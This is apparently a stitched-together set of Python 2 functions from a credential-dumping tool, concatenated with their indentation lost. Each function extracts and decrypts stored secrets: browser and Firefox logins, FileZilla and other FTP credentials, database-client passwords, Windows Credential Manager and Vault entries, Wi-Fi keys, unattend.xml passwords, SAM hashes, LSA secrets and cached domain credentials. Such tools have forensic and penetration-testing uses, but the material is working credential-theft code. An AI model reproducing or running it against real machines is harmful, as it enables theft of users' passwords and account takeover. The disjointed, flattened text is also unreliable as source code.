def run(self, software_name=None):
path = build_path(software_name)
if path:
xml_file = os.path.join(path, u'SQLAliases23.xml')
if os.path.exists(xml_file):
tree = ET.ElementTree(file=xml_file)
pwdFound = []
for elem in tree.iter('Bean'):
values = {}
for e in elem:
if e.tag == 'name':
values['Name'] = e.text
elif e.tag == 'url':
values['URL'] = e.text
elif e.tag == 'userName':
values['Login'] = e.text
elif e.tag == 'password':
values['Password'] = e.text
if values:
pwdFound.append(values)
return pwdFound
def run(self, software_name=None):
path = build_path(software_name)
if path:
pwdFound = []
for file in [u'sitemanager.xml', u'recentservers.xml', u'filezilla.xml']:
xml_file = os.path.join(path, file)
if os.path.exists(xml_file):
tree = ET.ElementTree(file=xml_file)
servers = tree.findall('Servers/Server') if tree.findall('Servers/Server') else tree.findall('RecentServers/Server')
for server in servers:
host = server.find('Host')
port = server.find('Port')
login = server.find('User')
password = server.find('Pass')
if host is not None and port is not None and login is not None:
values = {
'Host' : host.text,
'Port' : port.text,
'Login' : login.text,
}
if password is not None:
if 'encoding' in password.attrib and password.attrib['encoding'] == 'base64':
values['Password'] = base64.b64decode(password.text)
else:
values['Password'] = password.text
pwdFound.append(values)
return pwdFound
def run(self, software_name=None):
path = build_path(software_name)
if path:
filepath = os.path.join(path, u'Ftplist.txt')
if os.path.exists(filepath):
f = open(filepath, 'r')
pwdFound = []
for ff in f.readlines():
values = {}
info = ff.split(';')
for i in info:
i = i.split('=')
if i[0] == 'Name':
values['Name'] = i[1]
if i[0] == 'Server':
values['Host'] = i[1]
if i[0] == 'Port':
values['Port'] = i[1]
if i[0] == 'User':
values['Login'] = i[1]
if i[0] == "Password":
if i[1] != '1' and i[1] != '0':
values['Password'] = self.decode(i[1])
# used to save the password if it is an anonymous authentication
if values[
'Login'] == 'anonymous' and 'Password' not in values.keys(
):
values['Password'] = '******'
pwdFound.append(values)
return pwdFound
def run(self, software_name=None):
path = build_path(software_name)
if path:
pwdFound = []
pwdNotDecryptable = 0
pwdNotSaved = 0
for profile in os.listdir(path):
# Cookies Decrypt Methods
self.cookie_enum(path,profile)
# Cookies Decrypt Methods
self.export_history(path,profile)
# Password Methods
if not self.decrypt_passwords:
continue
database_path = os.path.join(path, profile, u'Login Data')
if not os.path.exists(database_path):
print_debug('DEBUG', u'User database not found: {database_path}'.format(database_path=database_path))
continue
else:
print_debug('DEBUG', u'User database found: {database_path}'.format(database_path=database_path))
# Connect to the Database
try:
conn = sqlite3.connect(database_path)
cursor = conn.cursor()
except Exception,e:
print_debug('ERROR', u'An error occured opening the database file')
print_debug('DEBUG', traceback.format_exc())
continue
# Get the results
cursor.execute('SELECT action_url, username_value, password_value, blacklisted_by_user FROM logins')
for result in cursor.fetchall():
try:
# Decrypt the Password
password = constant.user_dpapi.decrypt_blob(result[2])
if password:
pwdFound.append(
{
'URL' : result[0],
'Login' : result[1],
'Password' : password
}
)
else:
if result[3] is 1:
pwdNotSaved += 1
print_debug('WARNING', u'Blacklisted by User: Site: {url}'.format(url=result[0]))
else:
pwdNotDecryptable += 1
print_debug('WARNING', u"Couldn't decrypt: Site: {0}, User: {1}".format(result[0],result[1]))
except Exception,e:
print_debug('DEBUG', traceback.format_exc())
conn.close()
def run(self, software_name=None):
path = build_path(software_name)
if path:
pwdFound = []
for root, dirs, files in os.walk(path):
for name_file in files:
f = open(os.path.join(path, name_file), 'r')
url = ''
username = ''
result = ''
i = 0
# password
for line in f:
if i == -1:
result = line.replace('\n', '')
break
if line.startswith('password'):
i = -3
i+=1
i = 0
# url
for line in f:
if i == -1:
url = line.replace('\n', '')
break
if line.startswith('svn:realmstring'):
i = -3
i+=1
i = 0
# username
for line in f:
if i == -1:
username = line.replace('\n', '')
break
if line.startswith('username'):
i = -3
i+=1
# encrypted the password
if result:
try:
password = constant.user_dpapi.decrypt_blob(base64.b64decode(result))
pwdFound.append(
{
'URL' : url,
'Login' : username,
'Password' : str(password)
}
)
except:
pass
return pwdFound
def run(self, software_name=None):
pwdFound = []
# Get the installation path
path = build_path(software_name)
if path:
for profile in os.listdir(path):
p = os.path.join(path, profile)
print_debug('INFO', u'Profile path found: {profile}'.format(profile=p))
if not os.path.exists(os.path.join(p, 'key3.db')):
print_debug('WARNING', u'key3 file not found: {key3_file}'.format(key3_file=self.key3))
continue
self.key3 = self.readBsddb(os.path.join(p, u'key3.db'))
if not self.key3:
continue
credentials = self.get_database(p)
if credentials:
(globalSalt, masterPassword, entrySalt) = self.is_masterpassword_correct()
# Find masterpassword if set
if not globalSalt:
print_debug('WARNING', u'Master Password is used !')
masterPassword = self.found_masterpassword()
if not masterPassword:
continue
# Get user secret key
key = self.extractSecretKey(globalSalt, masterPassword, entrySalt)
# Everything is ready to decrypt password
for host, user, passw in credentials:
# Login
loginASN1 = decoder.decode(b64decode(user))
iv = loginASN1[0][1][1].asOctets()
ciphertext = loginASN1[0][2].asOctets()
login = DES3.new( key, DES3.MODE_CBC, iv).decrypt(ciphertext)
# Password
passwdASN1 = decoder.decode(b64decode(passw))
iv = passwdASN1[0][1][1].asOctets()
ciphertext = passwdASN1[0][2].asOctets()
password = DES3.new( key, DES3.MODE_CBC, iv).decrypt(ciphertext)
pwdFound.append(
{
'URL' : host,
'Login' : self.remove_padding(login),
'Password' : self.remove_padding(password),
}
)
return pwdFound
def run(self, software_name=None):
pwdFound = []
path = build_path('DPAPI')
if path:
creds_directory = os.path.join(path, u'Roaming', u'Credentials')
if os.path.exists(creds_directory):
for cred_file in os.listdir(creds_directory):
cred = constant.user_dpapi.decrypt_cred(
os.path.join(creds_directory, cred_file))
if cred:
pwdFound.append(cred)
return pwdFound
def run(self, software_name=None):
path = build_path(software_name)
if path:
xml_file = os.path.join(path, u'dbvis.xml')
if os.path.exists(xml_file):
tree = ET.ElementTree(file=xml_file)
pwdFound = []
for e in tree.findall('Databases/Database'):
values = {}
try:
values['Name'] = e.find('Alias').text
except:
pass
try:
values['Login'] = e.find('Userid').text
except:
pass
try:
ciphered_password = e.find('Password').text
password = self.decrypt(ciphered_password)
values['Password'] = password
except:
pass
try:
values['Driver'] = e.find(
'UrlVariables//Driver').text.strip()
except:
pass
try:
elem = e.find('UrlVariables')
for ee in elem.getchildren():
for ele in ee.getchildren():
if 'Server' == ele.attrib['UrlVariableName']:
values['Host'] = str(ele.text)
if 'Port' == ele.attrib['UrlVariableName']:
values['Port'] = str(ele.text)
if 'SID' == ele.attrib['UrlVariableName']:
values['SID'] = str(ele.text)
except:
pass
if values:
pwdFound.append(values)
return pwdFound
def run(self, software_name=None):
pwdFound = []
path = build_path('Hives')
if path:
system = os.path.join(path, 'SYSTEM')
sam = os.path.join(path, 'SAM')
if os.path.exists(system) and os.path.exists(sam):
hashes = dump_file_hashes(system, sam)
if hashes:
pwdFound = ['__Hashdump__', hashes]
return pwdFound
def run(self, software_name=None):
pwdFound = []
path = build_path('Hives')
if path:
system = os.path.join(path, 'SYSTEM')
security = os.path.join(path, 'SECURITY')
if os.path.exists(system) and os.path.exists(security):
if os.path.isfile(system) and os.path.isfile(security):
secrets = get_file_secrets(system, security, True)
if secrets:
pwdFound = ['__LSASecrets__', secrets]
return pwdFound
def run(self, software_name=None):
pwdFound = []
path = build_path('Hives')
if path:
system = os.path.join(path, 'SYSTEM')
security = os.path.join(path, 'SECURITY')
if os.path.exists(system) and os.path.exists(security):
if os.path.isfile(system) and os.path.isfile(security):
hashes = dump_file_hashes(system, security, True)
if hashes:
pwdFound = ['__MSCache__', hashes]
return pwdFound
def run(self, software_name=None): """ Extract all connection's credentials. :return: List of dict in which one dict contains all information for a connection. """ path = build_path(software_name) if path: for file in self.paths: if os.path.exists(os.path.join(path, file['filename'])): return self.parse_json(os.path.join(path, file['filename'])) for directory in self.paths: connection_file_path = os.path.join(path, directory['directory'], directory['filename']) if os.path.exists(connection_file_path): return self.parse_json(connection_file_path)
def run(self, software_name=None):
path = build_path(software_name)
if path:
pwdFound = []
for profile in os.listdir(path):
database_path = os.path.join(path, profile, u'Login Data')
if not os.path.exists(database_path):
print_debug(
'DEBUG',
u'User database not found: {database_path}'.format(
database_path=database_path))
continue
else:
print_debug(
'DEBUG',
u'User database found: {database_path}'.format(
database_path=database_path))
# Connect to the Database
try:
conn = sqlite3.connect(database_path)
cursor = conn.cursor()
except Exception, e:
print_debug('ERROR',
u'An error occured opening the database file')
print_debug('DEBUG', traceback.format_exc())
continue
# Get the results
cursor.execute(
'SELECT action_url, username_value, password_value FROM logins'
)
for result in cursor.fetchall():
try:
# Decrypt the Password
password = constant.user_dpapi.decrypt_blob(result[2])
if password:
pwdFound.append({
'URL': result[0],
'Login': result[1],
'Password': password
})
except Exception, e:
print_debug('DEBUG', traceback.format_exc())
conn.close()
def run(self, software_name=None):
pwdFound = []
vaults_directory = build_path('Vault_system')
if vaults_directory:
dpapi = constant.user_dpapi if constant.user_dpapi is not None else Decrypt_DPAPI(
)
if dpapi:
for vault_directory in os.listdir(vaults_directory):
vault_directory = os.path.join(vaults_directory,
vault_directory)
try:
result = dpapi.decrypt_system_vault(vault_directory)
if result:
pwdFound += result
except:
print_debug('DEBUG', traceback.format_exc())
return pwdFound
def run(self, software_name=None):
pwdFound = []
path = build_path('DPAPI')
if path:
vaults_directory = os.path.join(path, u'Local', u'Vault')
if os.path.exists(vaults_directory):
for vault_directory in os.listdir(vaults_directory):
vault_directory = os.path.join(vaults_directory,
vault_directory)
try:
result = constant.user_dpapi.decrypt_vault(
vault_directory)
if result:
pwdFound += result
except:
print_debug('DEBUG', traceback.format_exc())
return pwdFound
def run(self, software_name=None):
"""
Main function
"""
pwdFound = []
path = build_path(software_name)
if path:
for profile in os.listdir(path):
if profile == '.DS_Store':
continue
profile = os.path.join(path, profile)
print_debug(
'INFO',
u'Profile path found: {profile}'.format(profile=profile))
key = self.get_key(profile)
if key:
credentials = self.getLoginData(profile)
for user, passw, url in credentials:
try:
pwdFound.append({
'URL':
url,
'Login':
self.decrypt(key=key,
iv=user[1],
ciphertext=user[2]),
'Password':
self.decrypt(key=key,
iv=passw[1],
ciphertext=passw[2]),
})
except Exception, e:
print_debug(
'DEBUG',
u'An error occured decrypting the password: {error}'
.format(error=e))
return pwdFound
def run(self, software_name=None):
path = build_path(software_name)
if path:
account_file = os.path.join(path, u'accounts.xml')
if os.path.exists(account_file):
tree = ET.ElementTree(file=account_file)
root = tree.getroot()
pwdFound = []
for account in root.findall('account'):
if account.find('name') is not None:
name = account.find('name')
password = account.find('password')
if name is not None and password is not None:
pwdFound.append({
'Login': name.text,
'Password': password.text
})
return pwdFound
def run(self, software_name=None):
path = build_path(software_name)
if path:
self._passphrase = self.get_passphrase(path)
if self._passphrase:
print_debug('INFO', 'Passphrase found: {passphrase}'.format(passphrase=self._passphrase))
xml_name = u'connections.xml'
xml_file = None
if os.path.exists(os.path.join(path, xml_name)):
xml_file = os.path.join(path, xml_name)
else:
for p in os.listdir(path):
if p.startswith('system'):
new_directory = os.path.join(path, p)
for pp in os.listdir(new_directory):
if pp.startswith(u'o.jdeveloper.db.connection'):
if os.path.exists(os.path.join(new_directory, pp, xml_name)):
xml_file = os.path.join(new_directory, pp, xml_name)
break
if xml_file:
wanted_value = ['sid', 'port', 'hostname', 'user', 'password', 'ConnName', 'customUrl', 'SavePassword', 'driver']
renamed_value = {'sid': 'SID', 'port': 'Port', 'hostname': 'Host', 'user': '******', 'password': '******', 'ConnName': 'Name', 'customUrl': 'URL', 'SavePassword': '******', 'driver': 'Driver'}
tree = ET.ElementTree(file=xml_file)
pwdFound = []
for e in tree.findall('Reference'):
values = {}
for ee in e.findall('RefAddresses/StringRefAddr'):
if ee.attrib['addrType'] in wanted_value and ee.find('Contents').text is not None:
name = renamed_value[ee.attrib['addrType']]
value = ee.find('Contents').text if name != 'Password' else self.decrypt(ee.find('Contents').text)
values[name] = value
pwdFound.append(values)
return pwdFound
def run(self, software_name=None):
path = build_path(software_name)
if path:
pwdFound = []
dpapi = constant.user_dpapi if constant.user_dpapi is not None else Decrypt_DPAPI()
if dpapi:
for repository in os.listdir(path):
wifi_dir = os.path.join(path, repository)
for r, _, xml_files in os.walk(wifi_dir):
for xml_file in xml_files:
values = {}
xml = os.path.join(r, xml_file)
tree = ET.ElementTree(file=xml)
root = tree.getroot()
xmlschema = ''
if '}' in root.tag:
i = root.tag.index('}')
xmlschema = root.tag[:i+1]
name = root.find('{xmlschema}name'.format(xmlschema=xmlschema))
if name is not None:
values['Wifi'] = name.text
authentication = root.find('{xmlschema}MSM/{xmlschema}security/{xmlschema}authEncryption/{xmlschema}authentication'.format(xmlschema=xmlschema))
if authentication is not None:
values['Authentication'] = authentication.text
key_material = root.find('{xmlschema}MSM/{xmlschema}security/{xmlschema}sharedKey/{xmlschema}keyMaterial'.format(xmlschema=xmlschema))
if key_material is not None:
wifi_pwd = dpapi.decrypt_wifi_blob(key_material.text)
values['Password'] = wifi_pwd
if values:
pwdFound.append(values)
return pwdFound
def __init__(self, password=None, pwdhash=None):
self.sid = None
self.umkp = None
self.smkp = None
adding_missing_path = u''
# User Information
path = build_path('DPAPI')
if constant.dump == 'local':
adding_missing_path = u'/Microsoft'
if path:
protect_folder = os.path.join(
path,
u'Roaming{path}/Protect'.format(path=adding_missing_path))
credhist_file = os.path.join(
path, u'Roaming{path}/Protect/CREDHIST'.format(
path=adding_missing_path))
if os.path.exists(protect_folder):
for folder in os.listdir(protect_folder):
if folder.startswith('S-'):
self.sid = folder
break
if self.sid:
masterkeydir = os.path.join(protect_folder, self.sid)
if os.path.exists(masterkeydir):
self.umkp = MasterKeyPool()
self.umkp.load_directory(masterkeydir)
self.umkp.add_credhist_file(sid=self.sid,
credfile=credhist_file)
if password:
for r in self.umkp.try_credential(
sid=self.sid, password=password):
print_debug('INFO', r)
elif pwdhash:
for r in self.umkp.try_credential_hash(
self.sid, pwdhash=pwdhash.decode('hex')):
print_debug('INFO', r)
# System Information
path = build_path('Hives')
if path:
system = os.path.join(path, 'SYSTEM')
security = os.path.join(path, 'SECURITY')
if os.path.exists(system) and os.path.exists(security):
if os.path.isfile(system) and os.path.isfile(security):
reg = Regedit()
secrets = reg.get_lsa_secrets(security, system)
if secrets:
dpapi_system = secrets.get('DPAPI_SYSTEM')["CurrVal"]
path = build_path('Dpapi_System')
if path:
masterkeydir = os.path.join(
path, u'Protect', u'S-1-5-18', u'User')
if os.path.exists(masterkeydir):
self.smkp = MasterKeyPool()
self.smkp.load_directory(masterkeydir)
self.smkp.add_system_credential(dpapi_system)
for r in self.smkp.try_system_credential():
print_debug('INFO', r)
def __init__(self, password=None, pwdhash=None):
self.sid = None
self.preferred_umkp = None
self.dpapi_ok = False
self.umkp = None
self.smkp = None
self.last_masterkey_file = None
adding_missing_path = ''
# -------------------------- User Information --------------------------
path = build_path('DPAPI')
if constant.dump == 'local':
adding_missing_path = '/Microsoft'
if path:
protect_folder = os.path.join(path, 'Roaming{path}/Protect'.format(path=adding_missing_path))
if os.path.exists(protect_folder):
for folder in os.listdir(protect_folder):
if folder.startswith('S-'):
self.sid = folder
masterkeydir = os.path.join(protect_folder, self.sid)
if os.path.exists(masterkeydir):
# user master key pool
self.umkp = masterkey.MasterKeyPool()
# load all master key files (not only the one contained on preferred)
self.umkp.loadDirectory(masterkeydir)
preferred_file = os.path.join(masterkeydir, 'Preferred')
if os.path.exists(preferred_file):
preferred_mk_guid = display_masterkey(open(preferred_file, 'rb'))
# Preferred file contains the GUID of the last mastekey created
self.last_masterkey_file = os.path.join(masterkeydir, preferred_mk_guid)
if os.path.exists(self.last_masterkey_file):
print_debug('DEBUG', 'Last masterkey created: {masterkefile}'.format(masterkefile=self.last_masterkey_file))
self.preferred_umkp = masterkey.MasterKeyPool()
self.preferred_umkp.addMasterKey(open(self.last_masterkey_file, 'rb').read())
credhist_path = os.path.join(path, 'Roaming{path}/Protect/CREDHIST'.format(path=adding_missing_path))
credhist = credhist_path if os.path.exists(credhist_path) else None
if credhist:
self.umkp.addCredhistFile(self.sid, credhist)
if password:
if self.umkp.try_credential(self.sid, password):
self.dpapi_ok = True
else:
print_debug('DEBUG', 'Password not correct: {password}'.format(password=password))
elif pwdhash:
if self.umkp.try_credential_hash(self.sid, pwdhash.decode('hex')):
self.dpapi_ok = True
else:
print_debug('DEBUG', 'Hash not correct: {pwdhash}'.format(pwdhash=pwdhash))
# -------------------------- System Information --------------------------
path = build_path('Hives')
if path:
system = os.path.join(path, 'SYSTEM')
security = os.path.join(path, 'SECURITY')
if os.path.exists(system) and os.path.exists(security):
if os.path.isfile(system) and os.path.isfile(security):
reg = registry.Regedit()
secrets = None
try:
secrets = reg.get_lsa_secrets(security, system)
except:
print_debug('DEBUG', traceback.format_exc())
if secrets:
dpapi_system = secrets.get('DPAPI_SYSTEM')["CurrVal"]
path = build_path('Dpapi_System')
if path:
masterkeydir = os.path.join(path, 'Protect', 'S-1-5-18', 'User')
if os.path.exists(masterkeydir):
self.smkp = masterkey.MasterKeyPool()
self.smkp.loadDirectory(masterkeydir)
self.smkp.addSystemCredential(dpapi_system)
self.smkp.try_credential_hash(None, None)
def run(self, software_name=None):
windir = build_path(software_name)
if windir:
files = [
'Panther\Unattend.xml', 'Panther\Unattended.xml',
'Panther\Unattend\Unattended.xml',
'Panther\Unattend\Unattend.xml',
'System32\Sysprep\unattend.xml',
'System32\Sysprep\Panther\unattend.xml'
]
pwdFound = []
xmlns = '{urn:schemas-microsoft-com:unattend}'
for file in files:
path = os.path.join(windir, unicode(file))
if os.path.exists(path):
print_debug('INFO', u'Unattended file found: %s' % path)
tree = ET.ElementTree(file=path)
root = tree.getroot()
for setting in root.findall('%ssettings' % xmlns):
component = setting.find('%scomponent' % xmlns)
autoLogon = component.find('%sAutoLogon' % xmlns)
if autoLogon != None:
username = autoLogon.find('%sUsername' % xmlns)
password = autoLogon.find('%sPassword' % xmlns)
if username != None and password != None:
# Remove false positive (with following message on password => *SENSITIVE*DATA*DELETED*)
if not 'deleted' in password.text.lower():
pwdFound.append({
'Login':
username.text,
'Password':
self.try_b64_decode(password.text)
})
userAccounts = component.find('%sUserAccounts' % xmlns)
if userAccounts != None:
localAccounts = userAccounts.find(
'%sLocalAccounts' % xmlns)
if localAccounts != None:
for localAccount in localAccounts.findall(
'%sLocalAccount' % xmlns):
username = localAccount.find('%sName' %
xmlns)
password = localAccount.find('%sPassword' %
xmlns)
if username != None and password != None:
if not 'deleted' in password.text.lower(
):
pwdFound.append({
'Login':
username.text,
'Password':
self.try_b64_decode(
password.text)
})
return pwdFound
